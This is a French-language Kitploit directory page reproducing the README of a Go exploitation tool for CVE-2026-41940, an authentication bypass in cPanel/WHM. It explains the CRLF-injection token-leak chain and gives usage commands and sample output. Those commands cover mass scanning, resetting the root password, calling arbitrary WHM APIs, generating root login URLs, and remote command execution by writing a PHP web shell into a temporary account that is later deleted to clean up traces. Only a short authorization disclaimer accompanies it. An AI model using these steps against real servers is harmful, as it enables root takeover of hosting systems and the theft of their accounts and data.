Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cPanelWHM-AuthBypass — Outil de scan et d'exploitation basé sur Go pour CVE-2026-41940, un contournement d'authentification dans cPanel/WHM. Prend en charge le scan par lots, la fuite de jetons et les actions de post-exploitation comme l'exécution de code à distance (RCE), le changement de mot de passe et les appels API. | Kitploit
Outils/GitHubGitHub/kagantua/cpanelwhm-authbypass
Scanners de VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationRed Teaming
GitHubkagantua/cpanelwhm-authbypass

cPanelWHM-AuthBypass

Voir le dépôt
107il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Outil de scan et d'exploitation basé sur Go pour CVE-2026-41940, un contournement d'authentification dans cPanel/WHM. Prend en charge le scan par lots, la fuite de jetons et les actions de post-exploitation comme l'exécution de code à distance (RCE), le changement de mot de passe et les appels API.

Partager

Outil de Scan et d'Exploitation du Contournement d'Authentification cPanel/WHM

Outil en ligne de commande Go réécrit à partir du PoC Python de watchTowr, conçu pour détecter et exploiter la vulnérabilité de contournement d'authentification CVE-2026-41940 cPanel/WHM.

Aperçu de la vulnérabilité

CVE-2026-41940 est une vulnérabilité de contournement d'authentification dans cPanel/WHM. La chaîne d'attaque exploite une injection CRLF dans l'en-tête Basic Auth pour divulguer le jeton de sécurité et obtenir les privilèges root WHM.

Chaîne d'attaque en 4 étapes :

  1. Pré-authentification — Envoi de mauvaises identifiants à /login/ pour obtenir le cookie brut whostmgrsession
  2. Injection CRLF — Injection de caractères de nouvelle ligne via l'en-tête Authorization: Basic pour forcer le serveur à divulguer le jeton de sécurité cpsess dans l'en-tête Location de la redirection 307
  • Propagation du jeton — Déclenchement de do_token_denied pour propager les données d'authentification injectées du stockage brut vers le cache
  • Vérification des privilèges — Utilisation du jeton divulgué pour accéder à /json-api/version et vérifier l'obtention des privilèges root
  • Fonctionnalités

    • Scan par lot — Détection de cibles en masse à partir d'un fichier, avec exécution concurrente
    • Détection sur cible unique — Vérification rapide d'une URL unique
    • Gestion intelligente des URL — Compatibilité automatique avec http://, https://, formats sans protocole, déduplication automatique
    • Exploitation
      • Modification du mot de passe root (-passwd)
      • Appel de fonctions WHM API arbitraires (-api)
      • Génération d'URL de connexion en un clic (-session)
      • Exécution de commandes à distance / RCE (-cmd)
    • Mise en évidence dans le terminal — [VULN] en rouge, [SAFE] en vert
    • Enregistrement des résultats — Les URL vulnérables sont automatiquement enregistrées dans un fichier

    Compilation

    root@kitploit:~
    # Nécessite Go 1.20+
    cd cpanel-checker
    go build -o cpanel-checker .
    

    Utilisation

    Aperçu des paramètres

    ParamètreDescriptionExemple
    -uURL cible unique-u https://1.2.3.4:2087
    -fFichier contenant la liste des URL-f targets.txt
    -oChemin du fichier de sortie (défaut result.txt)-o vuln.txt
    -cNombre de tâches concurrentes (défaut 10)-c 20
    -hostnameSpécification manuelle de l'en-tête Host (défaut : découverte automatique)-hostname cpanel.example.com
    -passwdModification du mot de passe root (mode -u uniquement)-passwd NewP@ss123
    -apiAppel d'une fonction WHM API (mode -u uniquement)-api listaccts
    -api-paramsParamètres WHM API, séparés par des virgules-api-params user=root,password=123
    -sessionGénération d'une URL de connexion root en un clic (mode -u uniquement)-session
    -keepConserver le compte temporaire RCE sans le supprimer (avec -cmd)-keep
    -cmdExécution de commandes à distance / RCE (mode -u uniquement)-cmd "id"

    1. Détection sur cible unique

    root@kitploit:~
    ./cpanel-checker -u https://target:2087
    

    Le port par défaut est 2087, les écritures suivantes sont équivalentes :

    root@kitploit:~
    ./cpanel-checker -u https://target
    ./cpanel-checker -u target
    

    2. Scan par lot

    root@kitploit:~
    ./cpanel-checker -f targets.txt -c 20
    

    targets.txt prend en charge les formats suivants (une ligne par cible, les lignes commençant par # sont des commentaires) :

    root@kitploit:~
    https://1.1.1.1:2087
    http://2.2.2.2:2087
    3.3.3.3:2087
    4.4.4.4
    # Ceci est un commentaire
    
    • Déduplication automatique : http://1.1.1.1 et https://1.1.1.1 sont considérés comme la même cible, scannée une seule fois
    • Les adresses sans protocole sont automatiquement complétées par https://
    • Les adresses sans port utilisent automatiquement 2087
    • Les résultats sont enregistrés dans result.txt (personnalisable avec -o)

    3. Modification du mot de passe root

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -passwd "NewP@ssw0rd!"
    

    4. Appel de fonctions WHM API arbitraires

    root@kitploit:~
    # Lister tous les comptes
    ./cpanel-checker -u https://target:2087 -api listaccts
    
    # Appel avec paramètres
    ./cpanel-checker -u https://target:2087 -api passwd -api-params "user=root,password=abc123"
    

    5. Génération d'une URL de connexion en un clic

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -session
    

    Génère une URL qui, une fois ouverte dans un navigateur, donne accès au panneau d'administration WHM. Dans le panneau, utilisez la fonctionnalité Terminal pour obtenir un shell root interactif.

    Remarque : -session est semi-automatique — l'outil génère l'URL de connexion, puis vous devez l'ouvrir manuellement dans votre navigateur.

    6. Exécution de commandes à distance (RCE)

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -cmd "id"
    

    Ajoutez -keep pour conserver le compte temporaire, afin de vous connecter à l'interface cPanel :

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -cmd "id" -keep
    

    Avec -keep, la sortie inclura le nom d'utilisateur, le mot de passe et l'adresse de connexion cPanel du compte temporaire (https://host:2083). Utilisez directement ces identifiants pour vous connecter au panneau cPanel.

    -cmd est entièrement automatique, aucune autre action manuelle n'est requise. Processus interne :

    1. Exploitation du contournement d'authentification pour obtenir les privilèges root
    2. Création d'un compte cPanel temporaire via l'API WHM
    3. Écriture d'un shell PHP dans ~/public_html/ via UAPI (Fileman::save_file_content)
    4. Accès à https://host/~tmpuser/shell.php via HTTP pour exécuter des commandes
    5. Retour de la sortie de la commande
    6. Suppression automatique du compte temporaire (nettoyage des traces)

    Prérequis : les ports 80 ou 443 de la cible doivent être accessibles, et Apache/httpd doit être en cours d'exécution.

    7. Utilisation combinée

    Plusieurs paramètres d'exploitation peuvent être utilisés simultanément :

    root@kitploit:~
    # Obtenir l'URL de connexion, exécuter une commande et modifier le mot de passe en même temps
    ./cpanel-checker -u https://target:2087 -session -cmd "id" -passwd "NewP@ss123"
    

    8. Spécification manuelle de l'en-tête Host

    Lorsque l'IP cible ne correspond pas au nom d'hôte configuré dans cPanel, vous pouvez le spécifier manuellement :

    root@kitploit:~
    ./cpanel-checker -u https://1.2.3.4:2087 -hostname cpanel.example.com
    

    Par défaut, l'outil découvre automatiquement le nom d'hôte correct via la redirection 307 de /openid_connect/cpanelid.

    Exemple de sortie

    Scan par lot

    root@kitploit:~
    [1/5] [VULN] https://1.1.1.1:2087 - token=/cpsess1234567890
    [2/5] [SAFE] https://2.2.2.2:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched
    [3/5] [SAFE] https://3.3.3.3:2087 - stage1: request failed: dial tcp: i/o timeout
    [4/5] [VULN] https://4.4.4.4:2087 - token=/cpsess0987654321
    [5/5] [SAFE] https://5.5.5.5:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched
    
    ========== Scan terminé ==========
    Total: 5 | Vulnérables: 2
    
      ● https://1.1.1.1:2087
      ● https://4.4.4.4:2087
    
    [+] Résultats enregistrés dans result.txt
    

    Exécution RCE

    root@kitploit:~
    [*] Cible: https://target:2087
    [*] Mode: Exploitation
    
    [0] hostname = cpanel.example.com
    [1] minting a preauth session...
        session base = abc123def456
    [2] sending the CRLF injection (Basic auth + no-ob cookie)...
        leaked token = /cpsess1234567890
    [3] firing do_token_denied to propagate raw -> cache...
        gadget fired
    [4] verifying we're WHM root...
    [+] Privilèges root WHM obtenus
    
    [*] Exécution de commande à distance (RCE)...
        [a] Création du compte temporaire: tmpabcde
        [b] Écriture du shell: /home/tmpabcde/public_html/random.php
        [c] Exécution de la commande: id
        [d] Nettoyage du compte temporaire: tmpabcde
    [+] Sortie de la commande:
    uid=0(root) gid=0(root) groups=0(root)
    
    [+] Terminé. https://target:2087 est compromis
    

    Remarques

    • Les paramètres d'exploitation (-passwd, -api, -session, -cmd) ne sont disponibles qu'en mode cible unique -u, pas en mode lot -f
    • L'outil ignore la vérification des certificats TLS par défaut
    • Le délai d'expiration des requêtes est de 15 secondes
    • Les lignes commençant par # dans le fichier d'URL sont ignorées

    Avertissement

    Cet outil est destiné uniquement aux tests de sécurité autorisés et à la recherche. Tester des systèmes sans autorisation est illégal. L'utilisateur doit s'assurer d'avoir obtenu une autorisation écrite explicite du propriétaire du système cible. L'auteur décline toute responsabilité en cas d'utilisation abusive.

    Remerciements

    • PoC original : watchTowr / Sina Kheirkhah (@SinSinology)
    • CVE : CVE-2026-41940
    Télécharger l’outil